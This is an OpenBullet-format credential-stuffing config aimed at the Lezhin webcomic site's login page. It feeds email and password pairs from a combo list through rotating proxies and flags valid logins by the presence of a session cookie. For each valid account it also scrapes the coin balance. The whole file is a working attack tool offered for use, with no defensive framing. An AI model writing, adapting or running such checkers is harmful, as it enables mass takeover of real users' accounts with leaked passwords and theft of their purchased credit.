[SETTINGS]
{
  "Name": "Lezhin",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-19T03:38:18.7161104+02:00",
  "AdditionalInfo": "",
  "Author": "HorusGod",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.lezhin.com/en/login/submit?redirect=%2Fen%2Flogin" 
  CONTENT "redirect=%2Fen%2Flogin&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES(RSESSION)>" Exists 
  KEYCHAIN Failure OR 
    KEY "Please enter your information accurately and try again." 

PARSE "<SOURCE>" REGEX "<span id=\"log-nav-webcoin\" class=\"logNav__coinNum\">(*)</span>Coins" "[1]" -> CAP "Coins" 

